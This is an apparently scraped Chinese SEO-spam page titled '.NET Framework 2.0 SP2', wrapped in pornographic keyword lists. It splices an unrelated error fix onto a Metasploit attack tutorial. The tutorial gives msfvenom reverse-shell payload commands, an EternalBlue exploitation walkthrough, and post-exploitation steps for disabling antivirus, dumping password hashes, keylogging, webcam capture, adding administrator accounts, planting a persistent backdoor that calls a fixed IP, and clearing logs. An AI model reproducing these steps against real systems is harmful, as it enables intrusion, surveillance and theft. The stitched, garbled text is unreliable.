欧美第十页,AA视频aa,肏比视频网站,老鸭窝在线观看免费视频

net framework 2.0 sp2

前沿拓展:

net framework 2

win7中出現(xiàn) CLR20r3錯誤 .net framework 錯誤是設(shè)置錯誤造成的,解決方法為:

1、待該軟件下載完成后,雙擊打開該軟件。

2、進入是一款開源安全漏洞檢測工具,附帶數(shù)千個已知的軟件漏洞,并保持持續(xù)更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區(qū)冠以“可以黑掉整個宇宙”之名

msfvenom(用于生成木馬文件)net framework 2.0 sp2

-p, –payload <payload> 指定需要使用的payload(攻擊荷載)
-l, –list [module_type] 列出指定模塊的所有可用資源,模塊類型包括: payloads, encoders, nops, all
-n, –nopsled <length> 為payload預(yù)先指定一個NOP滑動長度
-f, –format <format> 指定輸出格式 (使用 –help-formats 來獲取msf支持的輸出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(編碼器)
-a, –arch <architecture> 指定payload的目標架構(gòu)
–platform <platform> 指定payload的目標平臺
-s, –space <length> 設(shè)定有效攻擊荷載的最大長度
-b, –bad-chars <list> 設(shè)定規(guī)避字符集,比如: 'x00xff'
-i, –iterations <count> 指定payload的編碼次數(shù)
-c, –add-code <path> 指定一個附加的win32 shellcode文件
-x, –template <path> 指定一個自定義的可執(zhí)行文件作為模板
-k, –keep 保護模板程序的動作,注入的payload作 為一個新的進程運行
–payload-options 列舉payload的標準選項
-o, –out <path> 保存payload
-v, –var-name <name> 指定一個自定義的變量,以確定輸出格式
–shellest 最小化生成payload
-h, –help 查看幫助選項
–help-formats 查看msf支持的輸出格式列表查看支持的payload列表:msfvenom -l payloads
查看支持的輸出文件類型:msfvenom –help-formats
查看支持的編碼方式:(為了達到免殺的效果):msfvenom -l encoders
查看支持的空字段模塊:(為了達到免殺的效果):msfvenom -l nops

簡單payload使用

Linux:

反向連接:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=< Port to Connect On> -f elf > shell.elf
正向連接:msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f elf > shell.elf

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f exe > shell.exe

PHP:

msfvenom -p php/meterpreter_reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< IP Address> LPORT=< Port to Connect On> -f asp > shell.asp

Python:

msfvenom -p cmd/unix/reverse_python LHOST=< IP Address> LPORT=< Port to Connect On> -f raw > shell.pymsfconsole(命令行)net framework 2.0 sp2

這個界面可看到metasploit當(dāng)前版本,各個模塊的插件數(shù)量。

auxiliary掃描模塊exploits漏洞利用模塊payloadsencoders編碼模塊nops空字符模塊psot模塊evasion模塊(創(chuàng)建反殺毒軟件的木馬)

命令行可輸入search尋找利用模塊

msf5 > search MS17_010net framework 2.0 sp2

常用的payload

Linux:

linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tc

Windows:

windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcpMS17_010 Eternal bule(永恒之藍)

下面用永恒之藍演示一下

進入msfconsole search命令搜索MS17_010

net framework 2.0 sp2

搜索到相應(yīng)的五個模塊

使用第二個輔助模塊來幫助我們探測哪些主機存在漏洞 輸入此命令

msf5 > use auxiliary/scanner/**b/**b_ms17_010
msf5 auxiliary(scanner/**b/**b_ms17_010) >

查看所需要的配置信息:show options

net framework 2.0 sp2

使用RHOSTS 參數(shù) 來查詢指定IP范圍內(nèi)的主機是否存在漏洞 第二輸入exploit進行探測

net framework 2.0 sp2

看掃描結(jié)果 我內(nèi)網(wǎng)連的主機少 結(jié)果前面如果是+,說明這臺主機存在漏洞

之后就可以使用漏洞利用模塊了 輸入命令 輸入info查看漏洞信息

msf5 auxiliary(scanner/**b/**b_ms17_010) > use exploit/windows/**b/ms17_010_eternalblue
msf5 exploit(windows/**b/ms17_010_eternalblue) > infonet framework 2.0 sp2

查看payloads 命令:show payloads

net framework 2.0 sp2

可以看到很多payload 自己根據(jù)當(dāng)時情況使用哪個payload 想用哪個用哪個

設(shè)置payload 第二查看參數(shù)

net framework 2.0 sp2

RHOSTS 設(shè)置要攻擊的主機IP ;LHOSTS 設(shè)置自己的IP 用于接收反彈回來的shell,默認4444端口** 第二exploit開始攻擊

接下來就不演示了 說一下exploit攻擊成功后的滲透的相關(guān)命令

1.運行了exploit命令之后,就開啟了一個reverse TCP**來**本地的 4444 端口,攻擊者的本地主機地址(LHOST)和端口號(LPORT)。運行成功之后,我們將會看到命令提示符 meterpreter > 出現(xiàn),第二我們輸入: shell 即可切換到目標主機的windows shell,要想從目標主機shell退出到 meterpreter ,我們只需輸入:exit

想要從meterpreter退到msf:background
輸入命令: sessions -l 查看我們獲得的shell
輸入命令:sysinfo 查看攻擊目標主機的相關(guān)信息
查看攻擊目標主機是否在虛擬機上面運行:run post/windows/gather/checkvm
關(guān)閉目標主機上運行的殺毒軟件:run killav
獲取目標主機詳細信息并保存到本地:run scraper
關(guān)于文件的命令:
cd:切換目標目錄;
cat:讀取文件內(nèi)容;
rm:刪除文件;
edit:使用vim編輯文件
ls:獲取當(dāng)前目錄下的文件;
mkdir:新建目錄;
rmdir:刪除目錄
關(guān)于上傳文件和下載文件:
upload file 向目標主機上傳文件
download file 在目標主機下載文件

2.關(guān)于提高權(quán)限

1.輸入命令:getsystem 幫助我們提高權(quán)限(提示錯誤,但已經(jīng)成功提權(quán))
2.命令:getuid 獲取當(dāng)前用戶信息(查看是什么權(quán)限)

3.獲取目標主機用戶名密碼

1.run windows/gather/credentials/windows_autologin 抓取自動登錄用戶的用戶名和登錄密碼
2.run hashdump hashdump模塊從SAM數(shù)據(jù)庫導(dǎo)出本地用戶(得到的密碼哈希值可用 Jhon the Ripper來破解密碼)

4.關(guān)于目標主機里的程序

1.run post/windows/gather/enum_applications 查看目標主機安裝的應(yīng)用程序
2.execute 此命令可在目標系統(tǒng)中執(zhí)行相關(guān)應(yīng)用程序
execute 參數(shù) -f 可執(zhí)行文件
可選參數(shù):
-f:指定可執(zhí)行文件
-H:創(chuàng)建一個隱藏進程
-a:傳遞給命令的參數(shù)
-i: 跟進程進行交互
-m:從內(nèi)存中執(zhí)行
-t: 使用當(dāng)前偽造的線程令牌運行進程
-s: 在給定會話中執(zhí)行進程screenshot 目標主機屏幕截圖 圖片會保存到/root目錄下

5.創(chuàng)建新本地用戶

1.run post/windows/gather/enum_logged_on_users 查看當(dāng)前主機已存在的用戶
2.run getgui -u username -p password 添加一個用戶為username,密碼為password的用戶,第二添加到Administrators組中(如果添加失敗,可以使用之前execute命令運行cmd窗口手動將用戶添加到Administrators組中)

6.關(guān)于遠程桌面

第一確保目標主機開啟了遠程桌面功能

1.idletime 先檢查主機遠程用戶的空閑時長
2.run getgui -e
3.run post/windows/manage/enable_rdp 以上兩個命令都可開啟目標主機遠程桌面功能

7.關(guān)于記錄鍵盤

1.keyscan_start:開啟鍵盤記錄功能
2.keyscan_dump:顯示捕捉到的鍵盤記錄信息
3.keyscan_stop:停止鍵盤記錄功能

8.關(guān)于綁定進程實現(xiàn)meterpreter持久化

ps 查看目標設(shè)備中運行的進程
getpid 查看我們當(dāng)前運行的進程id
migrate 命令來綁定目標進程id(后面跟要綁定進程的id即可)
run post/windows/manage/migrate 此命令會自動尋找合適的教=進程第二換綁定進程

9.關(guān)于目標主機的攝像頭

webcam_list 獲取目標主機的攝像頭列表
webcam_snap 從指定的攝像頭拍攝照片
webcam_stream 從指定的攝像頭開啟視頻

10.關(guān)于留后門

如果目標主機關(guān)機,meterpreter建立的連接就會斷開

所以我們可以在目標主機系統(tǒng)內(nèi)留下一個持續(xù)性的后門,只要目標主機開機,我們就可以連接到該主機

通過添加服務(wù)到注冊表 之后只要開機就會自動啟動并連接

run persistence -X -i 8 -p 6666 -r 192.168.10.27 #反彈時間間隔是8s 會自動連接192.168.27的4444端口,缺點是容易被殺毒軟件查殺
#運行之后它就在目標機新建了這個文件:
C:WindowsTEMPCJzhFlNOWa.vbs 代表把該服務(wù)加入了注冊表中,只要開機就會啟動
添加之后的連接就是在6666端口進行**

11.最后清除**日志(拍拍**走人,要拍干凈才能走哦)

之前我們做的所有**作都會被記錄在攻擊的目標主機的系統(tǒng)日志文件之中,所以我們需要在完成攻擊之后清除掉**日志

clearev 清除**日志

拓展知識:

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請注明出處:http://cxzzxj.cn/10294.html

国产成人免费不卡视频| 亚洲五月丁香婷婷| 国产91模特无码| 日韩在线一区二区不卡视频| 99re在线播放国产一二三| 亚洲午夜av一二三区熟女| 观看视频成人久久看| 国产精品好好热AV在线下载| 日韩av一区二区三区免费看| 国产av色区| 欧美经典二区| 国产欧美视频综合二区| 国产精品白丝情趣AV网站| 中文字幕伦理四区五区| 中文字幕综合1区2区| 亚洲综合成人网| 精品久久久久高潮国产| 三区四区无码电影| 日韩一线在线观看| 亚洲国产成人无码AV在线影院| 欧美精品华人永久| 国内女性无套免费网站| 六月婷婷六月婷婷| 精品国产无码一区二区| 人妻在线看不卡| 熟妇人妻无码| 日本乱子仑| 九九九一区二区三区| 日本乱人伦片中文字幕三区| 欧美激情办公室叉叉叉内射| 18禁裸男晨勃露J毛免费观看| 久久91久久久久麻豆精品| 人人妻人人爽人人做夜欢视频九色 | 婷婷六月精品一区二区| 五月五开心网| rihansanji| 亚洲国产中文无线码在线 | 亚洲中文字幕无码乱码| 97超碰A∨| 五月丁香婷婷综合色| 日本免费字暮|